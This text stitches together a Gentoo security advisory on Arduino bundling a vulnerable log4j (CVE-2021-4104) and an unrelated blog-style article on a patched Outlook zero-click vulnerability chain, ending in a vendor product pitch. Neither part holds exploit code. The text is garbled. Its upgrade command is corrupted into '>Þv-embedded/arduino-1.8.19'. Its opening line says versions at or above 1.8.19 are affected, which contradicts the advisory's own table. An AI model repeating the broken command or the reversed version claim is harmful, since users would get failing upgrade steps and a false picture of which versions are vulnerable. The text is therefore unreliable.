Gentoo Linux Security Advisory 202312-4 - A vulnerability has been found in Arduino which bundled a vulnerable version of log4j. Versions greater than or equal to 1.8.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Arduino: Remote Code Execution  
     Date: December 22, 2023  
     Bugs: #830716  
       ID: 202312-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Arduino which bundled a vulnerable  
version of log4j.

Background  
=========  
Arduino is an open-source AVR electronics prototyping platform.

Affected packages  
================  
Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-embedded/arduino  < 1.8.19      >= 1.8.19

Description  
==========  
A vulnerability has been discovered in Arduino. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
Arduino bundles a vulnerable version of log4j that may lead to remote  
code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Arduino users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-embedded/arduino-1.8.19"

References  
=========  
[ 1 ] CVE-2021-4104  
      https://nvd.nist.gov/vuln/detail/CVE-2021-4104

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-04

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-04

A researcher found two Microsoft vulnerabilities which could be combined to achieve zero-click remote code execution.

An Akamai researcher has found two vulnerabilities in Windows that can be combined to achieve a full, zero-click remote code execution (RCE) in Outlook.

Both vulnerabilities were responsibly disclosed to Microsoft and addressed in the August 2023 and October 2023 patch Tuesdays, so the researcher felt it was no problem to disclose their findings.

The first vulnerability, listed as CVE-2023-35384, is a Windows HTML platforms security feature bypass vulnerability. It allows an attacker to craft a malicious file or send a malicious URL that would evade Security Zone tagging, resulting in a loss of integrity and availability of security features utilized by browsers and some custom applications (including Outlook).

This could allow an attacker to cause a user to access a URL in a less restricted Internet Security Zone than intended. Basically the exploit falsely tells the system that the file or URL is local so it has a higher trust factor. For more technical details and the methodology used to find the vulnerability we refer to the researchers post.

The second vulnerability, listed as CVE-2023-36710, is a Windows Media Foundation Core Remote Code Execution vulnerability where the word Remote refers to the location of the attacker. The attack itself is carried out locally.

As part of the process of playing a WAV (Waveform Audio File), the researcher found it was possible to cause two out-of-bounds writes for WAV files with a certain size. An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions.

To chain these vulnerabilities together, an attacker would have to send an affected Outlook client an email reminder with a custom notification sound. By using the first vulnerability the client would retrieve the sound file from any SMB server. The Server Message Block protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

And when the specially crafted sound file is auto-played this can lead to code execution on the victim’s machine without interaction (zero-click).

**Is this something to worry about?**

Personally, I don’t think so. Although the research was very thorough and interesting, creating a suitable sound file is challenging. The researcher noted that the smallest possible file size with IMA ADP codec is 1 GB and that it might not be possible to achieve in some codecs, like MP3.

Also, patches for the vulnerabilities have been available for months. It does prove however that with some effort it is possible to find these type of vulnerabilities, and there are undoubtedly more out there.

To demonstrate that fact, it is good to know that CVE-2023-35384 is the second patch bypass for CVE-2023-23397, which was discovered by the same researcher and patched by Microsoft as part of its May 2023 security updates.

The researcher criticized Microsoft’s patching methods:

> “As a result, the patch added more code that also had vulnerabilities in it. We suggested to remove the abused feature instead of using patches, since the feature does more harm than good.”

So, instead of rooting out the problem, Microsoft added more code and with that, made the attack surface larger. A problem we unfortunately encounter often.

If your organization has been unable to patch these vulnerabilities, you can mitigate the risks by using microsegmentation to block outgoing SMB connections to remote public IP addresses. Microsegmentation refers to an approach to security that involves dividing a network into segments and applying security controls to each segment based on the segment’s requirements.

Or use the ThreatDown DNS filtering module to block suspicious web domains and manage specific site restrictions.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Tag

#rce